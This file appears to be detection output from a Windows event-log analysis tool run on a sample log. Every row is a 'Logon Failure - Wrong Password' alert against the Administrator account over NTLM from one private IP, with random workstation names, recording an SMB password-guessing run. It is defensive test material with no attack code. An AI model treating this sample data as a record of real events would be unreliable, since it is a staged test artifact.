2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
